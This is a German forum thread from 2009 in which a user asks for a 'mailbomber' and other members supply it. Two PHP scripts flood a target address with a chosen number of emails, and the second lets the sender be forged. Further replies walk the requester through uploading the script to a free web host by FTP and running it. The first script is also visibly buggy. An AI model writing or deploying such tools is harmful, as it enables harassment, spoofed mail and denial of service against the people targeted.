[Suche] Mailbomber

Dieses Thema im Forum "Netzwerk, Telefon, Internet" wurde erstellt von Dam That River, 3. Februar 2009 .

  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 3. Februar 2009
    Hi,

    hat wer nen guten für mich? :p
    Wäre echt nett - BW ist euch sicher.

    MfG
     

  2. Anzeige
    Dealz: stark reduzierte Angebote finden.
  3. #2 3. Februar 2009
    Da bist du hier aber im falschen Bereich ;).
    Sowas ist in 5 Minuten selber gecodet schreib mit ne PM mit deinen vorstellungen von "gut" und ich mach dir das schnell.

    Bitteschön da ist der code nur noch in eine .php file klatschen :].
    Habs jetzt schnell gemacht kann sein das es nicht funtz, denke aber mal schon.
    Spoiler
    <html>
    <head><title>x69's Mailbomber</title></head>
    <body>
    <h1>x69's Mailbomber</h1>
    <form method="post">
    <table>
    <tr>
    <td>Empf&auml;nger:</td>
    <td><input name="to" /></td>
    </tr>
    <tr>
    <td>Betreff:</td>
    <td><input name="subject" /></td>
    </tr>
    <tr>
    <td>Anzahl:</td>
    <td><input name="anzahl" /></td>
    </tr>
    <tr>
    <td>Nachricht:</td>
    <td><textarea rows="10" cols="40" name="message"></textarea></td>
    </tr>
    </table><br />
    <input type="submit" value="Senden.." />
    </form>
    </body>
    </html>

    <?php
    $to = $_POST['mail'];
    $subject = $_POST['subject'];
    $message = $_POST['message'];
    $anzahl = $_POST['anzahl'];
    $sentmails = 0;

    for ($sentmails = 0; $sentmails == $anzahl; $sentmails++) {
    mail($to, $subject, $message);
    }
    echo "eMails werden versendet..<br />";
    if ($sentmails <= $anzahl) {
    echo "Es wurden $anzahl eMails versendet. <br />";
    echo "&copy; x69";
    }
    ?>
     
  4. #3 3. Februar 2009
    Hab auch nochmal einen gebastelt:

    Spoiler
    Code:
    <html>
    <head>
    
    </head>
    <body>
    
    <form method="post" action="[COLOR="Red"][B]bomb.php[/B][/COLOR]">
    
    Betreff:<br>
    <input name="betreff"><br>
    Ziel:<br>
    <input name="ziel" value="@."><br>
    Absender:<br>
    <input name="absender" value="@."><br>
    Text:<br>
    <textarea name="nachricht" cols="50" rows="5"></textarea><br>
    <br>
    Anzahl:<br>
    <input name="anzahl"><br>
    <input type="submit" value="bomb it!">
    </form>
    
    <?php
    $betreff = $_POST['betreff'];
    $ziel = $_POST['ziel'];
    $absender = $_POST['absender'];
    $nachricht = $_POST['nachricht'];
    $anzahl = $_POST['anzahl'];
    
    if(isset($betreff) && isset($ziel) && isset($absender) && isset($nachricht) && isset($anzahl))
    {
    while($i < $anzahl)
     {
     mail($ziel, $betreff, $nachricht, $absender);
     $i++;
     if($i == $anzahl)
     {
     echo "Es wurden $anzahl Mails mit dem Inhalt<br>$nachricht<br>an $ziel gesendet!";
     }
     }
    }
    ?>
    
    </body>
    </html>

    Oder möchtest du einen haben, mit dem man an mehrere Benutzer Emails schreiben kann?

    mfg
     
  5. #4 3. Februar 2009
    Nee, ich möchte nur einen Benutzer anschreiben, aber dein Script scheint nicht zu ffunktionieren. :( Oder wie genau muss ich es machen?
     
  6. #5 3. Februar 2009

    du musst den text in ein textdokument speichern, dessen Namen du danach in beliebigername.php änderst. Die Datei musst du dann auf einen Webserver laden, der php unterstützt, zb. funpic.de (schlechtes Beispiel, da deutscher Hoster). Diese Datei rufst du dann auf und gibt folgende Daten ein:

    Betreff: Welchen Betreff die Email haben soll
    Ziel: An wen die Email gesendet werden soll (xx@yy.de z.B.)
    Absender: Von wem soll die Email kommen? (Anonym, PeterLustig, xx@yy.de)
    Text: Was soll in der Email stehen? (Guten Tag, sie haben gewonnen!..)
    Anzahl: Wie viele Emails sollen gesendet werden?

    Ich hab das ganze jetzt mal so geschrieben, dass es eigentlich jeder verstehen müsste.
    Wenn du noch fragen hast, ich helfe gerne :)

    mfg
     
  7. #6 3. Februar 2009
    Ich habs verstanden, aber welchen Webhoster soll ich nehmen?^^
     
  8. #7 3. Februar 2009
    Zuletzt von einem Moderator bearbeitet: 15. April 2017
  9. #8 3. Februar 2009
    Zuletzt von einem Moderator bearbeitet: 15. April 2017
  10. #9 3. Februar 2009
    Zuletzt von einem Moderator bearbeitet: 15. April 2017
    Ich nehme mal an, du hast dich auf byethost.com registriert, oder?
    Dann musst du dir ein ftp Programm herunterladen, Filezilla zum Beispiel.
    Runterladen und installieren. Nachdem du es gestartet hast,
    siehst du oben eine Leiste mit "schnellverbindung".

    1.jpg
    {img-src: //www.suleitec.de/faq/images/1.jpg}


    Bei der registrierung hast du Daten per email zugeschickt bekommen,
    die du dort eingeben musst.

    Adresse = FTP Server
    Benutzer = FTP Login
    Passwort = FTP Password
    Port kannst du leerlassen, wenns nicht geht, 21 reinschreiben
    Danach auf Verbinden klicken.

    Nachdem du verbunden bist, einfach die Datei in das Fenster "Inhalt des Server-Verzeichnisses" ziehen.

    Zu guter letzt die Seite aufrufen. Der link steht auch in der Mail, die du erhalten hast!
    Beispiel bei mir:

    http://huebstar.byethost17.com/dateiname.php

    du musst darauf achten, dass bei
    "<form method="post" action="bomb.php">"
    in deiner php-datei "bomb.php" durch den namen der datei ersetzt wird.
    Edit: Habe dir die entsprechende Textstelle in meinem ersten post ganz oben markiert.

    mfg
     

  11. Videos zum Thema
Die Seite wird geladen...
Similar Threads - Mailbomber
  1. Antworten:
    4
    Aufrufe:
    1.182
  2. Sehr guter Mailbomber

    WAN , 5. September 2006 , im Forum: Sicherheit & Datenschutz
    Antworten:
    2
    Aufrufe:
    628
  3. Antworten:
    6
    Aufrufe:
    409
  4. Antworten:
    5
    Aufrufe:
    2.759